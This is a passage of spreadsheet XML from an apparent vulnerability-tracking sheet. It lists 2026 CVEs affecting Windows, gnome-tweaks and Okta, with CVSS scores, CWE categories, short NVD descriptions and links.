t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1038" s="5" t="inlineStr" /><c r="H1038" s="5" t="n"><v>0.004</v></c><c r="I1038" s="5" t="inlineStr" /><c r="J1038" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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8" s="5" t="inlineStr" /><c r="M1038" s="5" t="inlineStr" /><c r="N1038" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1038" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1038" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1038" s="5" t="inlineStr" /><c r="R1038" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1038" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1038" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69566</t></is></c></row><row r="1039"><c r="A1039" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1039" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1039" s="5" t="inlineStr"><is><t>CVE-2026-71329</t></is></c><c r="D1039" s="5" t="n"><v>6.8</v></c><c r="E1039" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1039" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1039" s="5" t="inlineStr" /><c r="H1039" s="5" t="n"><v>0.003</v></c><c r="I1039" s="5" t="inlineStr" /><c r="J1039" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K103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9" s="5" t="inlineStr" /><c r="M1039" s="5" t="inlineStr" /><c r="N1039" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1039" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1039" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1039" s="5" t="inlineStr" /><c r="R1039" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1039" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T1039" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71329</t></is></c></row><row r="1040"><c r="A1040" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1040" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1040" s="5" t="inlineStr"><is><t>CVE-2026-71348</t></is></c><c r="D1040" s="5" t="n"><v>6.8</v></c><c r="E1040" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1040" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1040" s="5" t="inlineStr" /><c r="H1040" s="5" t="n"><v>0.004</v></c><c r="I1040" s="5" t="inlineStr" /><c r="J1040" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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0" s="5" t="inlineStr" /><c r="M1040" s="5" t="inlineStr" /><c r="N1040" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1040" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1040" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1040" s="5" t="inlineStr" /><c r="R1040" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1040" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1040" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71348</t></is></c></row><row r="1041"><c r="A1041" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1041" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1041" s="5" t="inlineStr"><is><t>CVE-2026-71349</t></is></c><c r="D1041" s="5" t="n"><v>6.8</v></c><c r="E1041" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1041" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1041" s="5" t="inlineStr" /><c r="H1041" s="5" t="n"><v>0.004</v></c><c r="I1041" s="5" t="inlineStr" /><c r="J1041" s="5" t="inlineStr" /><c r="K1041" s="5" t="inlineStr" /><c r="L1041" s="5" t="inlineStr" /><c r="M1041" s="5" t="inlineStr" /><c r="N1041" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1041" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1041" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1041" s="5" t="inlineStr" /><c r="R1041" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1041" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1041" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71349</t></is></c></row><row r="1042"><c r="A1042" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1042" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1042" s="5" t="inlineStr"><is><t>CVE-2026-71350</t></is></c><c r="D1042" s="5" t="n"><v>6.8</v></c><c r="E1042" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1042" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1042" s="5" t="inlineStr" /><c r="H1042" s="5" t="n"><v>0.004</v></c><c r="I1042" s="5" t="inlineStr" /><c r="J1042" s="5" t="inlineStr" /><c r="K1042" s="5" t="inlineStr" /><c r="L1042" s="5" t="inlineStr" /><c r="M1042" s="5" t="inlineStr" /><c r="N1042" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1042" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1042" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1042" s="5" t="inlineStr" /><c r="R1042" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1042" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an unauthorized attacker to execute code with a physical attack.</t></is></c><c r="T1042" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71350</t></is></c></row><row r="1043"><c r="A1043" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1043" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1043" s="5" t="inlineStr"><is><t>CVE-2026-72985</t></is></c><c r="D1043" s="5" t="n"><v>6.8</v></c><c r="E1043" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1043" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1043" s="5" t="inlineStr" /><c r="H1043" s="5" t="n"><v>0.003</v></c><c r="I1043" s="5" t="inlineStr" /><c r="J1043" s="5" t="inlineStr" /><c r="K1043" s="5" t="inlineStr" /><c r="L1043" s="5" t="inlineStr" /><c r="M1043" s="5" t="inlineStr" /><c r="N1043" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1043" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1043" s="5" t="inlineStr" /><c r="R1043" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1043" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Volume Shadow Copy allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1043" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72985</t></is></c></row><row r="1044"><c r="A1044" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1044" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1044" s="5" t="inlineStr"><is><t>CVE-2026-72999</t></is></c><c r="D1044" s="5" t="n"><v>6.8</v></c><c r="E1044" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1044" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1044" s="5" t="inlineStr" /><c r="H1044" s="5" t="n"><v>0.003</v></c><c r="I1044" s="5" t="inlineStr" /><c r="J1044" s="5" t="inlineStr" /><c r="K1044" s="5" t="inlineStr" /><c r="L1044" s="5" t="inlineStr" /><c r="M1044" s="5" t="inlineStr" /><c r="N1044" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1044" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1044" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1044" s="5" t="inlineStr" /><c r="R1044" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1044" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Hub Driver allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1044" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72999</t></is></c></row><row r="1045"><c r="A1045" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1045" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1045" s="5" t="inlineStr"><is><t>CVE-2026-74859</t></is></c><c r="D1045" s="5" t="n"><v>6.8</v></c><c r="E1045" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1045" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1045" s="5" t="inlineStr" /><c r="H1045" s="5" t="n"><v>0.001</v></c><c r="I1045" s="5" t="inlineStr" /><c r="J1045" s="5" t="inlineStr" /><c r="K1045" s="5" t="inlineStr" /><c r="L1045" s="5" t="inlineStr" /><c r="M1045" s="5" t="inlineStr" /><c r="N1045" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1045" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1045" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1045" s="5" t="inlineStr" /><c r="R1045" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1045" s="5" t="inlineStr"><is><t>The shell theme installer in gnome-tweaks extracts user-supplied ZIP archives without validating archive member paths. As a result, a crafted theme archive can write files outside ~/.themes by using ../ path traversal, absolute paths, or symlink entries.</t></is></c><c r="T1045" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74859</t></is></c></row><row r="1046"><c r="A1046" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1046" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1046" s="5" t="inlineStr"><is><t>CVE-2026-77892</t></is></c><c r="D1046" s="5" t="n"><v>6.8</v></c><c r="E1046" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1046" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1046" s="5" t="inlineStr" /><c r="H1046" s="5" t="n"><v>0.003</v></c><c r="I1046" s="5" t="inlineStr" /><c r="J1046" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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6" s="5" t="inlineStr" /><c r="M1046" s="5" t="inlineStr" /><c r="N1046" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1046" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1046" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1046" s="5" t="inlineStr" /><c r="R1046" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1046" s="5" t="inlineStr"><is><t>No cwe for this issue in Windows Boot Manager allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1046" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77892</t></is></c></row><row r="1047"><c r="A1047" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1047" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1047" s="5" t="inlineStr"><is><t>CVE-2026-78451</t></is></c><c r="D1047" s="5" t="n"><v>6.8</v></c><c r="E1047" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1047" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1047" s="5" t="inlineStr" /><c r="H1047" s="5" t="n"><v>0.004</v></c><c r="I1047" s="5" t="inlineStr" /><c r="J1047" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K104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47" s="5" t="inlineStr" /><c r="M1047" s="5" t="inlineStr" /><c r="N1047" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1047" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1047" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1047" s="5" t="inlineStr" /><c r="R1047" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S1047" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Windows SCSI Class System File allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="T1047" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78451</t></is></c></row><row r="1048"><c r="A1048" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1048" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1048" s="5" t="inlineStr"><is><t>CVE-2026-78579</t></is></c><c r="D1048" s="5" t="n"><v>6.8</v></c><c r="E1048" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1048" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1048" s="5" t="inlineStr" /><c r="H1048" s="5" t="n"><v>0.002</v></c><c r="I1048" s="5" t="inlineStr" /><c r="J1048" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1048" s="5" t="inlineStr" /><c r="L1048" s="5" t="inlineStr" /><c r="M1048" s="5" t="inlineStr" /><c r="N1048" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1048" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1048" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1048" s="5" t="inlineStr" /><c r="R1048" s="5" t="inlineStr"><is><t>CWE-90</t></is></c><c r="S1048" s="5" t="inlineStr"><is><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is></c><c r="T1048" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t></is></c></row><row r="1049"><c r="A1049" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1049" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1049" s="5" t="inlineStr"><is><t>CVE-2026-69350</t></is></c><c r="D1049" s="5" t="n"><v>6.7</v></c><c r="E1049" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1049" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1049" s="5" t="inlineStr" /><c r="H1049" s="5" t="n"><v>0.003</v></c><c r="I1049" s="5" t="inlineStr" /><c r="J1049" s="5" t="inlineStr" /><c r="K1049" s="5" t="inlineStr" /><c r="L1049" s="5" t="inlineStr" /><c r="M1049" s="5" t="inlineStr" /><c r="N1049" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1049" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1049" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1049" s="5" t="inlineStr" /><c r="R1049" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1049" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1049" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69350</t></is></c></row><row r="1050"><c r="A1050" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1050" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1050" s="5" t="inlineStr"><is><t>CVE-2026-69373</t></is></c><c r="D1050" s="5" t="n"><v>6.7</v></c><c r="E1050" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1050" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1050" s="5" t="inlineStr" /><c r="H1050" s="5" t="n"><v>0.003</v></c><c r="I1050" s="5" t="inlineStr" /><c r="J1050" s="5" t="inlineStr" /><c r="K1050" s="5" t="inlineStr" /><c r="L1050" s="5" t="inlineStr" /><c r="M1050" s="5" t="inlineStr" /><c r="N1050" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1050" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1050" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1050" s="5" t="inlineStr" /><c r="R1050" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S1050" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1050" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69373</t></is></c></row><row r="1051"><c r="A1051" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1051" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1051" s="5" t="inlineStr"><is><t>CVE-2026-69449</t></is></c><c r="D1051" s="5" t="n"><v>6.7</v></c><c r="E1051" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1051" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1051" s="5" t="inlineStr" /><c r="H1051" s="5" t="n"><v>0.004</v></c><c r="I1051" s="5" t="inlineStr" /><c r="J1051" s="5" t="inlineStr" /><c r="K1051" s="5" t="inlineStr" /><c r="L1051" s="5" t="inlineStr" /><c r="M1051" s="5" t="inlineStr" /><c r="N1051" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1051" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1051" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1051" s="5" t="inlineStr" /><c r="R1051" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1051" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows BitLocker allows an authorized attacker to execute code locally.</t></is></c><c r="T1051" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69449</t></is></c></row><row r="1052"><c r="A1052" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1052" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1052" s="5" t="inlineStr"><is><t>CVE-2026-69820</t></is></c><c r="D1052" s="5" t="n"><v>6.7</v></c><c r="E1052" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1052" s="5" t="inlineStr" /><c r="H1052" s="5" t="n"><v>0.003</v></c><c r="I1052" s="5" t="inlineStr" /><c r="J1052" s="5" t="inlineStr" /><c r="K1052" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1052" s="5" t="inlineStr" /><c r="M1052" s="5" t="inlineStr" /><c r="N1052" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1052" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1052" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1052" s="5" t="inlineStr" /><c r="R1052" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1052" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1052" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t></is></c></row><row r="1053"><c r="A1053" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1053" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1053" s="5" t="inlineStr"><is><t>CVE-2026-71339</t></is></c><c r="D1053" s="5" t="n"><v>6.7</v></c><c r="E1053" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1053" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1053" s="5" t="inlineStr" /><c r="H1053" s="5" t="n"><v>0.003</v></c><c r="I1053" s="5" t="inlineStr" /><c r="J1053" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K105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53" s="5" t="inlineStr" /><c r="M1053" s="5" t="inlineStr" /><c r="N1053" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1053" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1053" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1053" s="5" t="inlineStr" /><c r="R1053" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1053" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1053" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t></is></c></row><row r="1054"><c r="A1054" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1054" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1054" s="5" t="inlineStr"><is><t>CVE-2026-72927</t></is></c><c r="D1054" s="5" t="n"><v>6.7</v></c><c r="E1054" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1054" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1054" s="5" t="inlineStr" /><c r="H1054" s="5" t="n"><v>0.003</v></c><c r="I1054" s="5" t="inlineStr" /><c r="J1054" s="5" t="inlineStr" /><c r="K1054" s="5" t="inlineStr" /><c r="L1054" s="5" t="inlineStr" /><c r="M1054" s="5" t="inlineStr" /><c r="N1054" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1054" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1054" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1054" s="5" t="inlineStr" /><c r="R1054" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1054" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Winsock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1054" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72927</t></is></c></row><row r="1055"><c r="A1055" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1055" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1055" s="5" t="inlineStr"><is><t>CVE-2026-72935</t></is></c><c r="D1055" s="5" t="n"><v>6.7</v></c><c r="E1055" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1055" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1055" s="5" t="inlineStr" /><c r="H1055" s="5" t="n"><v>0.003</v></c><c r="I1055" s="5" t="inlineStr" /><c r="J1055" s="5" t="inlineStr" /><c r="K1055" s="5" t="inlineStr" /><c r="L1055" s="5" t="inlineStr" /><c r="M1055" s="5" t="inlineStr" /><c r="N1055" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1055" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1055" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1055" s="5" t="inlineStr" /><c r="R1055" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1055" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1055" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72935</t></is></c></row><row r="1056"><c r="A1056" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1056" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1056" s="5" t="inlineStr"><is><t>CVE-2026-72948</t></is></c><c r="D1056" s="5" t="n"><v>6.7</v></c><c r="E1056" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1056" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1056" s="5" t="inlineStr" /><c r="H1056" s="5" t="n"><v>0.004</v></c><c r="I1056" s="5" t="inlineStr" /><c r="J1056" s="5" t="inlineStr" /><c r="K1056" s="5" t="inlineStr" /><c r="L1056" s="5" t="inlineStr" /><c r="M1056" s="5" t="inlineStr" /><c r="N1056" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1056" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1056" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1056" s="5" t="inlineStr" /><c r="R1056" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1056" s="5" t="inlineStr"><is><t>Relative path traversal in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1056" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72948</t></is></c></row><row r="1057"><c r="A1057" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1057" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1057" s="5" t="inlineStr"><is><t>CVE-2026-78625</t></is></c><c r="D1057" s="5" t="n"><v>6.7</v></c><c r="E1057" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1057" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1057" s="5" t="inlineStr" /><c r="H1057" s="5" t="n"><v>0.002</v></c><c r="I1057" s="5" t="inlineStr" /><c r="J1057" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1057" s="5" t="inlineStr" /><c r="L1057" s="5" t="inlineStr" /><c r="M1057" s="5" t="inlineStr" /><c r="N1057" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1057" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1057" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1057" s="5" t="inlineStr" /><c r="R1057" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1057" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize dashboard label values before writing them into generated PHP configuration files. The generated file is automatically included during authentication requests, resulting in execution with the privileges of the web server process.</t></is></c><c r="T1057" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t></is></c></row><row r="1058"><c r="A1058" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1058" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1058" s="5" t="inlineStr"><is><t>CVE-2026-78630</t></is></c><c r="D1058" s="5" t="n"><v>6.7</v></c><c r="E1058" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1058" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1058" s="5" t="inlineStr" /><c r="H1058" s="5" t="n"><v>0.002</v></c><c r="I1058" s="5" t="inlineStr" /><c r="J1058" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1058" s="5" t="inlineStr" /><c r="L1058" s="5" t="inlineStr" /><c r="M1058" s="5" t="inlineStr" /><c r="N1058" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1058" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1058" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1058" s="5" t="inlineStr" /><c r="R1058" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S1058" s="5" t="inlineStr"><is><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is></c><c r="T1058" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t></is></c></row><row r="1059"><c r="A1059" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1059" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1059" s="5" t="inlineStr"><is><t>CVE-2026-85981</t></is></c><c r="D1059" s="5" t="n"><v>6.7</v></c><c r="E1059" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1059" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1059" s="5" t="inlineStr" /><c r="H1059" s="5" t="n"><v>0.001</v></c><c r="I1059" s="5" t="inlineStr" /><c r="J1059" s="5" t="inlineStr" /><c r="K1059" s="5" t="inlineStr" /><c r="L1059" s="5" t="inlineStr" /><c r="M1059" s="5" t="inlineStr" /><c r="N1059" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1059" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1059" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1059" s="5" t="inlineStr" /><c r="R1059" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1059" s="5" t="inlineStr"><is><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is></c><c r="T1059" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85981</t></is></c></row><row r="1060"><c r="A1060" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1060" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1060" s="5" t="inlineStr"><is><t>CVE-2026-52486</t></is></c><c r="D1060" s="5" t="n"><v>6.6</v></c><c r="E1060" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1060" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1060" s="5" t="inlineStr" /><c r="H1060" s="5" t="n"><v>0.001</v></c><c r="I1060" s="5" t="inlineStr" /><c r="J1060" s="5" t="inlineStr" /><c r="K1060" s="5" t="inlineStr" 